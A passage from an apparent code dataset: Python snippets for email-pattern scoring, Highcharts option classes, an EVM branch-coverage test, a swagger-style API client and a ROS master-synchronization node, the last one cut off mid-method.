code stringlengths 281 23.7M |
|---|
def _add_mail_adress_score(string, score):
regex = '(([^<>()[\\]\\\\.,;:\\\\"]+(\\.[^<>()[\\]\\\\.,;:\\\\"]+)*)|(\\".+\\"))((\\[[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\])|(([a-zA-Z\\-0-9]+\\.)+[a-zA-Z]{2,}))'
match = re.search(regex, string)
return ((score + 150) if match else score) |
class OptionPlotoptionsHeatmapSonificationContexttracksMappingGapbetweennotes(Options):
    """Highcharts ``plotOptions.heatmap.sonification.contextTracks.mapping.gapBetweenNotes``
    option group.

    Each option is exposed as a property pair: the getter returns the
    configured value (``None`` meaning "use the Highcharts default") and the
    setter writes it into the option tree via ``_config``.  The original
    code defined getter and setter under the same name without decorators,
    so the setter silently shadowed the getter.
    """

    @property
    def mapFunction(self):
        """Mapping function for the parameter (e.g. 'linear' or 'logarithmic')."""
        return self._config_get(None)

    @mapFunction.setter
    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    @property
    def mapTo(self):
        """Point property to map the parameter to."""
        return self._config_get(None)

    @mapTo.setter
    def mapTo(self, text: str):
        self._config(text, js_type=False)

    @property
    def max(self):
        """Maximum value of the mapped output range."""
        return self._config_get(None)

    @max.setter
    def max(self, num: float):
        self._config(num, js_type=False)

    @property
    def min(self):
        """Minimum value of the mapped output range."""
        return self._config_get(None)

    @min.setter
    def min(self, num: float):
        self._config(num, js_type=False)

    @property
    def within(self):
        """Data set to compute the mapping extremes within (e.g. 'chart', 'series')."""
        return self._config_get(None)

    @within.setter
    def within(self, value: Any):
        self._config(value, js_type=False)
def test_require6(evmtester, branch_results):
    """Branch coverage for `requireBranches` case 6: the passing call records
    all True branches; each failing variant records the expected mix of
    True and False branch hits."""

    def expect_hits(results, truthy, falsy=()):
        # every recorded hit is the pair [start_offset, start_offset + 1]
        for start in truthy:
            assert [start, start + 1] in results[True]
        for start in falsy:
            assert [start, start + 1] in results[False]

    evmtester.requireBranches(6, False, False, False, False)
    expect_hits(branch_results(), (1813, 1850, 1896, 1902, 1908, 1933, 1939, 1945))

    with pytest.raises(VirtualMachineError):
        evmtester.requireBranches(6, True, False, False, False)
    expect_hits(branch_results(), (1819, 1856), (1813, 1850, 1896))

    with pytest.raises(VirtualMachineError):
        evmtester.requireBranches(6, False, True, False, False)
    expect_hits(branch_results(), (1813, 1850, 1896), (1902,))

    with pytest.raises(VirtualMachineError):
        evmtester.requireBranches(6, False, False, True, False)
    expect_hits(branch_results(), (1813, 1850, 1896, 1902), (1908,))
class OptionSeriesAreaDataDatalabels(Options):
    """Highcharts ``series.area.data.dataLabels`` option group.

    Each scalar option is exposed as a property pair: the getter returns the
    configured value, falling back to the Highcharts default passed to
    ``_config_get``; the setter stores the value via ``_config``.  Sub-option
    groups (``animation``, ``filter``, ``textPath``) are read-only properties
    returning lazily-created sub-config objects.  The original code defined
    getters and setters under the same name without decorators, so each
    setter silently shadowed its getter.
    """

    @property
    def align(self):
        """Horizontal alignment of the label relative to the point (default 'center')."""
        return self._config_get('center')

    @align.setter
    def align(self, text: str):
        self._config(text, js_type=False)

    @property
    def allowOverlap(self):
        """Whether labels may overlap each other (default False)."""
        return self._config_get(False)

    @allowOverlap.setter
    def allowOverlap(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def animation(self) -> 'OptionSeriesAreaDataDatalabelsAnimation':
        """Label animation sub-options (lazily created sub-config)."""
        return self._config_sub_data('animation', OptionSeriesAreaDataDatalabelsAnimation)

    @property
    def backgroundColor(self):
        """Background color or gradient for the label."""
        return self._config_get(None)

    @backgroundColor.setter
    def backgroundColor(self, text: str):
        self._config(text, js_type=False)

    @property
    def borderColor(self):
        """Border color for the label."""
        return self._config_get(None)

    @borderColor.setter
    def borderColor(self, text: str):
        self._config(text, js_type=False)

    @property
    def borderRadius(self):
        """Border corner radius in pixels (default 0)."""
        return self._config_get(0)

    @borderRadius.setter
    def borderRadius(self, num: float):
        self._config(num, js_type=False)

    @property
    def borderWidth(self):
        """Border width in pixels (default 0)."""
        return self._config_get(0)

    @borderWidth.setter
    def borderWidth(self, num: float):
        self._config(num, js_type=False)

    @property
    def className(self):
        """CSS class name for styled mode."""
        return self._config_get(None)

    @className.setter
    def className(self, text: str):
        self._config(text, js_type=False)

    @property
    def color(self):
        """Text color of the label."""
        return self._config_get(None)

    @color.setter
    def color(self, text: str):
        self._config(text, js_type=False)

    @property
    def crop(self):
        """Whether to hide labels that are outside the plot area (default True)."""
        return self._config_get(True)

    @crop.setter
    def crop(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def defer(self):
        """Whether to defer displaying labels until the series animation ends (default True)."""
        return self._config_get(True)

    @defer.setter
    def defer(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def enabled(self):
        """Whether data labels are shown (default False)."""
        return self._config_get(False)

    @enabled.setter
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def filter(self) -> 'OptionSeriesAreaDataDatalabelsFilter':
        """Declarative label filter sub-options (lazily created sub-config)."""
        return self._config_sub_data('filter', OptionSeriesAreaDataDatalabelsFilter)

    @property
    def format(self):
        """Format string for the label (default 'point.value')."""
        return self._config_get('point.value')

    @format.setter
    def format(self, text: str):
        self._config(text, js_type=False)

    @property
    def formatter(self):
        """JavaScript callback used to format the label; overrides ``format``."""
        return self._config_get(None)

    @formatter.setter
    def formatter(self, value: Any):
        self._config(value, js_type=False)

    @property
    def inside(self):
        """Whether to render the label inside the point element."""
        return self._config_get(None)

    @inside.setter
    def inside(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def nullFormat(self):
        """Format applied to points with a null value."""
        return self._config_get(None)

    @nullFormat.setter
    def nullFormat(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def nullFormatter(self):
        """JavaScript callback for points with a null value; overrides ``nullFormat``."""
        return self._config_get(None)

    @nullFormatter.setter
    def nullFormatter(self, value: Any):
        self._config(value, js_type=False)

    @property
    def overflow(self):
        """How to handle labels flowing outside the plot area (default 'justify')."""
        return self._config_get('justify')

    @overflow.setter
    def overflow(self, text: str):
        self._config(text, js_type=False)

    @property
    def padding(self):
        """Padding within the label box in pixels (default 5)."""
        return self._config_get(5)

    @padding.setter
    def padding(self, num: float):
        self._config(num, js_type=False)

    @property
    def position(self):
        """Alignment position of the label inside the point (default 'center')."""
        return self._config_get('center')

    @position.setter
    def position(self, text: str):
        self._config(text, js_type=False)

    @property
    def rotation(self):
        """Label rotation in degrees (default 0)."""
        return self._config_get(0)

    @rotation.setter
    def rotation(self, num: float):
        self._config(num, js_type=False)

    @property
    def shadow(self):
        """Shadow for the label box (default False)."""
        return self._config_get(False)

    @shadow.setter
    def shadow(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def shape(self):
        """Symbol name for the label border frame (default 'square')."""
        return self._config_get('square')

    @shape.setter
    def shape(self, text: str):
        self._config(text, js_type=False)

    @property
    def style(self):
        """CSS style object applied to the label text."""
        return self._config_get(None)

    @style.setter
    def style(self, value: Any):
        self._config(value, js_type=False)

    @property
    def textPath(self) -> 'OptionSeriesAreaDataDatalabelsTextpath':
        """Text-path sub-options for rendering the label along a path."""
        return self._config_sub_data('textPath', OptionSeriesAreaDataDatalabelsTextpath)

    @property
    def useHTML(self):
        """Whether to render the label with HTML instead of SVG (default False)."""
        return self._config_get(False)

    @useHTML.setter
    def useHTML(self, flag: bool):
        self._config(flag, js_type=False)

    @property
    def verticalAlign(self):
        """Vertical alignment of the label (default 'bottom')."""
        return self._config_get('bottom')

    @verticalAlign.setter
    def verticalAlign(self, text: str):
        self._config(text, js_type=False)

    @property
    def x(self):
        """Horizontal pixel offset of the label (default 0)."""
        return self._config_get(0)

    @x.setter
    def x(self, num: float):
        self._config(num, js_type=False)

    @property
    def y(self):
        """Vertical pixel offset of the label (default 0)."""
        return self._config_get(0)

    @y.setter
    def y(self, num: float):
        self._config(num, js_type=False)

    @property
    def zIndex(self):
        """Z-index of the label group (default 6)."""
        return self._config_get(6)

    @zIndex.setter
    def zIndex(self, num: float):
        self._config(num, js_type=False)
class ApiClient(object):
    """Generic swagger-codegen style API client.

    Handles client-server communication: parameter serialization,
    deserialization of responses into model objects, authentication, and
    optional asynchronous requests through a thread pool.

    :param configuration: Configuration object for this client; a default
        one is created when omitted.
    :param header_name: a header to pass when making calls to the API.
    :param header_value: value of the header passed with every request.
    :param cookie: a cookie to include with every request.
    """

    PRIMITIVE_TYPES = (float, bool, bytes, six.text_type) + six.integer_types
    # Maps swagger type names to native Python types.
    NATIVE_TYPES_MAPPING = {'int': int, 'long': (int if six.PY3 else long), 'float': float, 'str': str, 'bool': bool, 'date': datetime.date, 'datetime': datetime.datetime, 'object': object}

    def __init__(self, configuration=None, header_name=None, header_value=None, cookie=None):
        if configuration is None:
            configuration = Configuration()
        self.configuration = configuration
        self._pool = None  # lazily created thread pool for async requests
        self.rest_client = rest.RESTClientObject(configuration)
        self.default_headers = {}
        if header_name is not None:
            self.default_headers[header_name] = header_value
        self.cookie = cookie
        # Assigning through the user_agent property sets the User-Agent header.
        self.user_agent = 'Swagger-Codegen/4.0/python'

    def __del__(self):
        # Shut down the thread pool if async requests were used.
        if self._pool is not None:
            self._pool.close()
            self._pool.join()

    @property
    def pool(self):
        """Thread pool used for asynchronous requests (created on first use)."""
        if self._pool is None:
            self._pool = ThreadPool()
        return self._pool

    @property
    def user_agent(self):
        """User-Agent header sent with every request."""
        return self.default_headers['User-Agent']

    @user_agent.setter
    def user_agent(self, value):
        self.default_headers['User-Agent'] = value

    def set_default_header(self, header_name, header_value):
        """Set a header to be sent with every request."""
        self.default_headers[header_name] = header_value

    def __call_api(self, resource_path, method, path_params=None, query_params=None,
                   header_params=None, body=None, post_params=None, files=None,
                   response_type=None, auth_settings=None, _return_http_data_only=None,
                   collection_formats=None, _preload_content=True, _request_timeout=None):
        """Build and execute a single HTTP request (synchronous core of call_api)."""
        config = self.configuration
        # header parameters
        header_params = header_params or {}
        header_params.update(self.default_headers)
        if self.cookie:
            header_params['Cookie'] = self.cookie
        if header_params:
            header_params = self.sanitize_for_serialization(header_params)
            header_params = dict(self.parameters_to_tuples(header_params, collection_formats))
        # path parameters: substitute '{name}' placeholders with quoted values
        if path_params:
            path_params = self.sanitize_for_serialization(path_params)
            path_params = self.parameters_to_tuples(path_params, collection_formats)
            for k, v in path_params:
                resource_path = resource_path.replace('{%s}' % k, quote(str(v), safe=config.safe_chars_for_path_param))
        # query parameters
        if query_params:
            query_params = self.sanitize_for_serialization(query_params)
            query_params = self.parameters_to_tuples(query_params, collection_formats)
        # post parameters (form fields and file uploads)
        if post_params or files:
            post_params = self.prepare_post_parameters(post_params, files)
            post_params = self.sanitize_for_serialization(post_params)
            post_params = self.parameters_to_tuples(post_params, collection_formats)
        # authentication settings
        self.update_params_for_auth(header_params, query_params, auth_settings)
        # request body
        if body:
            body = self.sanitize_for_serialization(body)
        # request url
        url = self.configuration.host + resource_path
        # perform the request and return the processed response
        response_data = self.request(method, url, query_params=query_params, headers=header_params, post_params=post_params, body=body, _preload_content=_preload_content, _request_timeout=_request_timeout)
        self.last_response = response_data
        return_data = response_data
        if _preload_content:
            # deserialize the response body into the requested type
            if response_type:
                return_data = self.deserialize(response_data, response_type)
            else:
                return_data = None
        if _return_http_data_only:
            return return_data
        else:
            return (return_data, response_data.status, response_data.getheaders())

    def sanitize_for_serialization(self, obj):
        """Build a JSON-serializable object from *obj*.

        None stays None; primitives are returned as-is; lists/tuples and
        dicts are sanitized recursively; date/datetime become ISO strings;
        swagger models become dicts keyed by their ``attribute_map`` names
        (attributes with value None are dropped).
        """
        if obj is None:
            return None
        elif isinstance(obj, self.PRIMITIVE_TYPES):
            return obj
        elif isinstance(obj, list):
            return [self.sanitize_for_serialization(sub_obj) for sub_obj in obj]
        elif isinstance(obj, tuple):
            return tuple(self.sanitize_for_serialization(sub_obj) for sub_obj in obj)
        elif isinstance(obj, (datetime.datetime, datetime.date)):
            return obj.isoformat()
        if isinstance(obj, dict):
            obj_dict = obj
        else:
            # swagger model: serialize only the non-None declared attributes
            obj_dict = {obj.attribute_map[attr]: getattr(obj, attr)
                        for attr, _ in six.iteritems(obj.swagger_types)
                        if getattr(obj, attr) is not None}
        return {key: self.sanitize_for_serialization(val) for key, val in six.iteritems(obj_dict)}

    def deserialize(self, response, response_type):
        """Deserialize an HTTP response into an object of *response_type*."""
        # handle file downloading: save the body to a temp file and return the path
        if response_type == 'file':
            return self.__deserialize_file(response)
        # fetch data from the response object
        try:
            data = json.loads(response.data)
        except ValueError:
            data = response.data
        return self.__deserialize(data, response_type)

    def __deserialize(self, data, klass):
        """Deserialize *data* (dict/list/str) into *klass* recursively."""
        if data is None:
            return None
        if isinstance(klass, str):
            if klass.startswith('list['):
                sub_kls = re.match(r'list\[(.*)\]', klass).group(1)
                return [self.__deserialize(sub_data, sub_kls) for sub_data in data]
            if klass.startswith('dict('):
                sub_kls = re.match(r'dict\(([^,]*), (.*)\)', klass).group(2)
                return {k: self.__deserialize(v, sub_kls) for k, v in six.iteritems(data)}
            # convert the string type name into a concrete class
            if klass in self.NATIVE_TYPES_MAPPING:
                klass = self.NATIVE_TYPES_MAPPING[klass]
            else:
                klass = getattr(models, klass)
        if klass in self.PRIMITIVE_TYPES:
            return self.__deserialize_primitive(data, klass)
        elif klass == object:
            return self.__deserialize_object(data)
        elif klass == datetime.date:
            return self.__deserialize_date(data)
        elif klass == datetime.datetime:
            return self.__deserialize_datatime(data)
        else:
            return self.__deserialize_model(data, klass)

    def call_api(self, resource_path, method, path_params=None, query_params=None,
                 header_params=None, body=None, post_params=None, files=None,
                 response_type=None, auth_settings=None, async_req=None,
                 _return_http_data_only=None, collection_formats=None,
                 _preload_content=True, _request_timeout=None):
        """Make the HTTP request, synchronously or asynchronously.

        When *async_req* is falsy the request runs in the calling thread and
        the (deserialized) response is returned directly; otherwise the
        request is submitted to the thread pool and an AsyncResult whose
        ``get()`` yields the response is returned.
        """
        if not async_req:
            return self.__call_api(resource_path, method, path_params, query_params, header_params, body, post_params, files, response_type, auth_settings, _return_http_data_only, collection_formats, _preload_content, _request_timeout)
        else:
            thread = self.pool.apply_async(self.__call_api, (resource_path, method, path_params, query_params, header_params, body, post_params, files, response_type, auth_settings, _return_http_data_only, collection_formats, _preload_content, _request_timeout))
            return thread

    def request(self, method, url, query_params=None, headers=None, post_params=None, body=None, _preload_content=True, _request_timeout=None):
        """Dispatch to the REST client method matching the HTTP verb."""
        if method == 'GET':
            return self.rest_client.GET(url, query_params=query_params, _preload_content=_preload_content, _request_timeout=_request_timeout, headers=headers)
        elif method == 'HEAD':
            return self.rest_client.HEAD(url, query_params=query_params, _preload_content=_preload_content, _request_timeout=_request_timeout, headers=headers)
        elif method == 'OPTIONS':
            return self.rest_client.OPTIONS(url, query_params=query_params, headers=headers, post_params=post_params, _preload_content=_preload_content, _request_timeout=_request_timeout, body=body)
        elif method == 'POST':
            return self.rest_client.POST(url, query_params=query_params, headers=headers, post_params=post_params, _preload_content=_preload_content, _request_timeout=_request_timeout, body=body)
        elif method == 'PUT':
            return self.rest_client.PUT(url, query_params=query_params, headers=headers, post_params=post_params, _preload_content=_preload_content, _request_timeout=_request_timeout, body=body)
        elif method == 'PATCH':
            return self.rest_client.PATCH(url, query_params=query_params, headers=headers, post_params=post_params, _preload_content=_preload_content, _request_timeout=_request_timeout, body=body)
        elif method == 'DELETE':
            return self.rest_client.DELETE(url, query_params=query_params, headers=headers, _preload_content=_preload_content, _request_timeout=_request_timeout, body=body)
        else:
            raise ValueError('http method must be `GET`, `HEAD`, `OPTIONS`, `POST`, `PATCH`, `PUT` or `DELETE`.')

    def parameters_to_tuples(self, params, collection_formats):
        """Expand parameters into (key, value) tuples honoring collection formats
        ('multi' repeats the key; 'ssv'/'tsv'/'pipes'/'csv' join the values)."""
        new_params = []
        if collection_formats is None:
            collection_formats = {}
        for k, v in (six.iteritems(params) if isinstance(params, dict) else params):
            if k in collection_formats:
                collection_format = collection_formats[k]
                if collection_format == 'multi':
                    new_params.extend((k, value) for value in v)
                else:
                    if collection_format == 'ssv':
                        delimiter = ' '
                    elif collection_format == 'tsv':
                        delimiter = '\t'
                    elif collection_format == 'pipes':
                        delimiter = '|'
                    else:
                        # default is csv
                        delimiter = ','
                    new_params.append((k, delimiter.join(str(value) for value in v)))
            else:
                new_params.append((k, v))
        return new_params

    def prepare_post_parameters(self, post_params=None, files=None):
        """Build form parameters, reading any file uploads from disk."""
        params = []
        if post_params:
            params = post_params
        if files:
            for k, v in six.iteritems(files):
                if not v:
                    continue
                file_names = v if isinstance(v, list) else [v]
                for n in file_names:
                    with open(n, 'rb') as f:
                        filename = os.path.basename(f.name)
                        filedata = f.read()
                        mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
                        params.append(tuple([k, tuple([filename, filedata, mimetype])]))
        return params

    def select_header_accept(self, accepts):
        """Return a preferred Accept header value from the given list."""
        if not accepts:
            return
        accepts = [x.lower() for x in accepts]
        if 'application/json' in accepts:
            return 'application/json'
        else:
            return ', '.join(accepts)

    def select_header_content_type(self, content_types):
        """Return a preferred Content-Type header value from the given list."""
        if not content_types:
            return 'application/json'
        content_types = [x.lower() for x in content_types]
        if ('application/json' in content_types) or ('*/*' in content_types):
            return 'application/json'
        else:
            return content_types[0]

    def update_params_for_auth(self, headers, querys, auth_settings):
        """Update header and query parameters based on authentication settings."""
        if not auth_settings:
            return
        for auth in auth_settings:
            auth_setting = self.configuration.auth_settings().get(auth)
            if auth_setting:
                if not auth_setting['value']:
                    continue
                elif auth_setting['in'] == 'header':
                    headers[auth_setting['key']] = auth_setting['value']
                elif auth_setting['in'] == 'query':
                    querys.append((auth_setting['key'], auth_setting['value']))
                else:
                    raise ValueError('Authentication token must be in `query` or `header`')

    def __deserialize_file(self, response):
        """Save the response body to a temporary file and return its path.

        The filename from the Content-Disposition header is used when present.
        """
        fd, path = tempfile.mkstemp(dir=self.configuration.temp_folder_path)
        os.close(fd)
        os.remove(path)
        content_disposition = response.getheader('Content-Disposition')
        if content_disposition:
            filename = re.search(r'filename=[\'"]?([^\'"\s]+)[\'"]?', content_disposition).group(1)
            path = os.path.join(os.path.dirname(path), filename)
        with open(path, 'wb') as f:
            f.write(response.data)
        return path

    def __deserialize_primitive(self, data, klass):
        """Coerce *data* to the primitive type *klass*, falling back to the
        raw value on type errors."""
        try:
            return klass(data)
        except UnicodeEncodeError:
            return six.text_type(data)
        except TypeError:
            return data

    def __deserialize_object(self, value):
        """Return the original value (generic 'object' type)."""
        return value

    def __deserialize_date(self, string):
        """Parse *string* into a datetime.date (returned unparsed if dateutil
        is unavailable)."""
        try:
            from dateutil.parser import parse
            return parse(string).date()
        except ImportError:
            return string
        except ValueError:
            raise rest.ApiException(status=0, reason='Failed to parse `{0}` as date object'.format(string))

    def __deserialize_datatime(self, string):
        """Parse *string* into a datetime.datetime (returned unparsed if
        dateutil is unavailable)."""
        try:
            from dateutil.parser import parse
            return parse(string)
        except ImportError:
            return string
        except ValueError:
            raise rest.ApiException(status=0, reason='Failed to parse `{0}` as datetime object'.format(string))

    def __hasattr(self, object, name):
        # NOTE: checks the class dict only, so inherited attributes are ignored.
        return name in object.__class__.__dict__

    def __deserialize_model(self, data, klass):
        """Deserialize a dict/list into a swagger model instance, resolving
        discriminated subclasses through ``get_real_child_model``."""
        if (not klass.swagger_types) and (not self.__hasattr(klass, 'get_real_child_model')):
            return data
        kwargs = {}
        if klass.swagger_types is not None:
            for attr, attr_type in six.iteritems(klass.swagger_types):
                if (data is not None) and (klass.attribute_map[attr] in data) and isinstance(data, (list, dict)):
                    value = data[klass.attribute_map[attr]]
                    kwargs[attr] = self.__deserialize(value, attr_type)
        instance = klass(**kwargs)
        # pass through any extra keys for dict-like models
        if isinstance(instance, dict) and (klass.swagger_types is not None) and isinstance(data, dict):
            for key, value in data.items():
                if key not in klass.swagger_types:
                    instance[key] = value
        if self.__hasattr(instance, 'get_real_child_model'):
            klass_name = instance.get_real_child_model(data)
            if klass_name:
                instance = self.__deserialize(data, klass_name)
        return instance
class Main(object):
    """Keeps the local ROS master synchronized with remote masters discovered
    by a master-discovery node: one ``SyncThread`` per remote master, plus
    diagnostics publishing for md5sum/type mismatches.

    NOTE(review): external helpers (``interface_finder``, ``SyncThread``,
    ``MasterInfo``, ``create_pattern`` ...) are defined elsewhere in the
    package; their exact semantics are assumed from usage here.
    """

    # Seconds between periodic re-queries of the 'list_masters' services.
    UPDATE_INTERVALL = 30

    def __init__(self):
        """Set up state, subscribe to master-change topics, advertise the
        sync-info service, and trigger the initial master discovery."""
        self.masters = {}
        self.masteruri = masteruri_from_master()
        self.hostname = get_hostname(self.masteruri)
        self._localname = ''
        # Reentrant lock guarding self.masters and related shared state.
        self.__lock = threading.RLock()
        self._load_interface()
        self._check_host = rospy.get_param('~check_host', True)
        topic_names = interface_finder.get_changes_topic(masteruri_from_master(), check_host=self._check_host)
        self.sub_changes = dict()
        for topic_name in topic_names:
            rospy.loginfo('listen for updates on %s', topic_name)
            self.sub_changes[topic_name] = rospy.Subscriber(topic_name, MasterState, self._rosmsg_callback_master_state)
        self.__timestamp_local = None
        self.__own_state = None
        self.update_timer = None
        self.resync_timer = None
        self.own_state_getter = None
        self._timer_update_diagnostics = None
        # Threads currently stopping SyncThreads, keyed by a uuid.
        self._join_threads = dict()
        rospy.Service('~get_sync_info', GetSyncInfo, self._rosservice_get_sync_info)
        rospy.on_shutdown(self.finish)
        self._current_diagnistic_level = None
        self.pub_diag = rospy.Publisher('/diagnostics', DiagnosticArray, queue_size=10, latch=True)
        self.obtain_masters()

    def _rosmsg_callback_master_state(self, data):
        """Handle a MasterState message: remove, add or update the
        corresponding remote master."""
        with self.__lock:
            if (not rospy.is_shutdown()):
                if (data.state in [MasterState.STATE_REMOVED]):
                    self.remove_master(data.master.name)
                elif (data.state in [MasterState.STATE_NEW, MasterState.STATE_CHANGED]):
                    m = data.master
                    self.update_master(m.name, m.uri, m.last_change.to_sec(), m.last_change_local.to_sec(), m.discoverer_name, m.monitoruri, m.online)

    def _callback_perform_resync(self):
        """Schedule a resync of all masters, debounced through a 0.1 s timer."""
        if (self.resync_timer is not None):
            self.resync_timer.cancel()
        self.resync_timer = threading.Timer(0.1, self._perform_resync)
        self.resync_timer.start()

    def obtain_masters(self):
        """Query all known 'list_masters' services for remote masters, update
        or remove the local SyncThreads accordingly, and reschedule itself
        to run again after UPDATE_INTERVALL seconds."""
        if (not rospy.is_shutdown()):
            service_names = interface_finder.get_listmaster_service(masteruri_from_master(), False, check_host=self._check_host)
            for service_name in service_names:
                try:
                    with self.__lock:
                        try:
                            socket.setdefaulttimeout(5)
                            discoverMasters = rospy.ServiceProxy(service_name, DiscoverMasters)
                            resp = discoverMasters()
                            masters = []
                            master_names = [m.name for m in resp.masters]
                            rospy.loginfo("ROS masters obtained from '%s': %s", service_name, master_names)
                            for m in resp.masters:
                                if self._can_sync(m.name):
                                    masters.append(m.name)
                                # update_master() re-checks _can_sync() itself
                                self.update_master(m.name, m.uri, m.last_change.to_sec(), m.last_change_local.to_sec(), m.discoverer_name, m.monitoruri, m.online)
                            # Drop masters that are no longer reported.
                            for key in (set(self.masters.keys()) - set(masters)):
                                self.remove_master(self.masters[key].name)
                        except rospy.ServiceException as e:
                            rospy.logwarn("ERROR Service call 'list_masters' failed: %s", str(e))
                except:
                    import traceback
                    rospy.logwarn('ERROR while initial list masters: %s', traceback.format_exc())
                finally:
                    # Always restore the global socket timeout.
                    socket.setdefaulttimeout(None)
            self.update_timer = threading.Timer(self.UPDATE_INTERVALL, self.obtain_masters)
            self.update_timer.start()

    def update_master(self, mastername, masteruri, timestamp, timestamp_local, discoverer_name, monitoruri, online):
        """Create or update the SyncThread for a remote master; for the local
        master, refresh the own state in a background thread when its local
        timestamp changed.  Also (re)starts the diagnostics updater thread."""
        try:
            with self.__lock:
                if (masteruri != self.masteruri):
                    # Remote master: only synchronize if not filtered out.
                    if self._can_sync(mastername):
                        if (self.__resync_on_reconnect and (mastername in self.masters)):
                            self.masters[mastername].set_online(online, self.__resync_on_reconnect_timeout)
                        if online:
                            if (mastername in self.masters):
                                self.masters[mastername].update(mastername, masteruri, discoverer_name, monitoruri, timestamp_local)
                            else:
                                # First contact: create a new SyncThread.
                                self.masters[mastername] = SyncThread(mastername, masteruri, discoverer_name, monitoruri, 0.0, self.__sync_topics_on_demand, callback_resync=self._callback_perform_resync)
                                if (self.__own_state is not None):
                                    self.masters[mastername].set_own_masterstate(MasterInfo.from_list(self.__own_state))
                                self.masters[mastername].update(mastername, masteruri, discoverer_name, monitoruri, timestamp_local)
                elif (self.__timestamp_local != timestamp_local):
                    # Local master changed: fetch its state asynchronously.
                    self._localname = mastername
                    self.own_state_getter = threading.Thread(target=self.get_own_state, args=(monitoruri,))
                    self.own_state_getter.start()
            if ((self._timer_update_diagnostics is None) or (not self._timer_update_diagnostics.is_alive())):
                self._timer_update_diagnostics = threading.Thread(target=self._update_diagnostics_state)
                self._timer_update_diagnostics.start()
        except:
            import traceback
            rospy.logwarn('ERROR while update master[%s]: %s', str(mastername), traceback.format_exc())

    def get_own_state(self, monitoruri):
        """Fetch the local master state via XML-RPC from *monitoruri* and push
        it to all SyncThreads; on failure retry every 3 s until shutdown."""
        try:
            socket.setdefaulttimeout(3)
            own_monitor = xmlrpcclient.ServerProxy(monitoruri)
            self.__own_state = own_monitor.masterInfo()
            own_state = MasterInfo.from_list(self.__own_state)
            socket.setdefaulttimeout(None)
            with self.__lock:
                for (_, s) in self.masters.items():
                    s.set_own_masterstate(own_state, self.__sync_topics_on_demand)
                self.__timestamp_local = own_state.timestamp_local
        except:
            import traceback
            rospy.logwarn("ERROR while getting own state from '%s': %s", monitoruri, traceback.format_exc())
            socket.setdefaulttimeout(None)
            time.sleep(3)
            # Retry in a fresh thread unless we were asked to stop.
            if ((self.own_state_getter is not None) and (not rospy.is_shutdown())):
                self.own_state_getter = threading.Thread(target=self.get_own_state, args=(monitoruri,))
                self.own_state_getter.start()

    def remove_master(self, ros_master_name):
        """Stop and remove the SyncThread of *ros_master_name*; the actual
        stop runs in a separate thread tracked in _join_threads."""
        try:
            with self.__lock:
                if (ros_master_name in self.masters):
                    m = self.masters.pop(ros_master_name)
                    ident = uuid.uuid4()
                    thread = threading.Thread(target=self._threading_stop_sync, args=(m, ident))
                    self._join_threads[ident] = thread
                    thread.start()
        except Exception:
            import traceback
            rospy.logwarn('ERROR while removing master[%s]: %s', ros_master_name, traceback.format_exc())

    def _threading_stop_sync(self, sync_thread, ident):
        """Worker: stop a SyncThread, then deregister itself from
        _join_threads under the lock."""
        if isinstance(sync_thread, SyncThread):
            rospy.loginfo((' Stop synchronization to `%s`' % sync_thread.name))
            sync_thread.stop()
            with self.__lock:
                del self._join_threads[ident]
            rospy.loginfo((' Finished synchronization to `%s`' % sync_thread.name))
            del sync_thread

    def finish(self, msg=''):
        """Shutdown hook: cancel timers, unregister subscribers, stop all
        SyncThreads and wait for their stop-threads to finish."""
        rospy.loginfo('Stop synchronization...')
        with self.__lock:
            rospy.loginfo(' Stop timers...')
            if (self.update_timer is not None):
                self.update_timer.cancel()
            if (self.resync_timer is not None):
                self.resync_timer.cancel()
            rospy.loginfo(' Unregister from master discovery...')
            for (_, v) in self.sub_changes.items():
                v.unregister()
            self.own_state_getter = None
        # Lock released here: the stop-threads also acquire it.
        for key in self.masters.keys():
            rospy.loginfo(' Remove master: %s', key)
            self.remove_master(key)
        while (len(self._join_threads) > 0):
            rospy.loginfo(' Wait for ending of %s threads ...', str(len(self._join_threads)))
            time.sleep(1)
        rospy.loginfo('Synchronization is now off')

    def _perform_resync(self):
        """Timer target: ask every SyncThread to resynchronize."""
        self.resync_timer = None
        with self.__lock:
            for (_, s) in self.masters.items():
                s.perform_resync()

    def _rosservice_get_sync_info(self, req):
        """Service handler for ~get_sync_info: collect sync info of all
        masters (best effort; returns whatever was gathered)."""
        masters = list()
        try:
            with self.__lock:
                for (_, s) in self.masters.items():
                    masters.append(s.get_sync_info())
        except:
            import traceback
            traceback.print_exc()
        finally:
            return GetSyncInfoResponse(masters)

    def _load_interface(self):
        """Load the sync interface file (~interface_url) and the related ROS
        parameters; on any error the whole process is killed, since the
        node must not run with a half-loaded filter configuration."""
        interface_file = resolve_url(rospy.get_param('~interface_url', ''))
        if interface_file:
            rospy.loginfo('interface_url: %s', interface_file)
        try:
            data = (read_interface(interface_file) if interface_file else {})
            self._re_ignore_hosts = create_pattern('ignore_hosts', data, interface_file, [])
            self._re_sync_hosts = create_pattern('sync_hosts', data, interface_file, [])
            self.__sync_topics_on_demand = False
            if interface_file:
                if ('sync_topics_on_demand' in data):
                    self.__sync_topics_on_demand = data['sync_topics_on_demand']
            elif rospy.has_param('~sync_topics_on_demand'):
                self.__sync_topics_on_demand = rospy.get_param('~sync_topics_on_demand')
            rospy.loginfo('sync_topics_on_demand: %s', self.__sync_topics_on_demand)
            self.__resync_on_reconnect = rospy.get_param('~resync_on_reconnect', True)
            rospy.loginfo('resync_on_reconnect: %s', self.__resync_on_reconnect)
            self.__resync_on_reconnect_timeout = rospy.get_param('~resync_on_reconnect_timeout', 0)
            rospy.loginfo('resync_on_reconnect_timeout: %s', self.__resync_on_reconnect_timeout)
        except:
            import traceback
            rospy.logerr('Error on load interface: %s', traceback.format_exc())
            # Hard exit: SIGKILL the own process on configuration errors.
            import os
            import signal
            os.kill(os.getpid(), signal.SIGKILL)

    def _can_sync(self, mastername):
        """Return True if *mastername* passes the ignore/sync host filters."""
        result = False
        if is_empty_pattern(self._re_ignore_hosts):
            if is_empty_pattern(self._re_sync_hosts):
                result = True
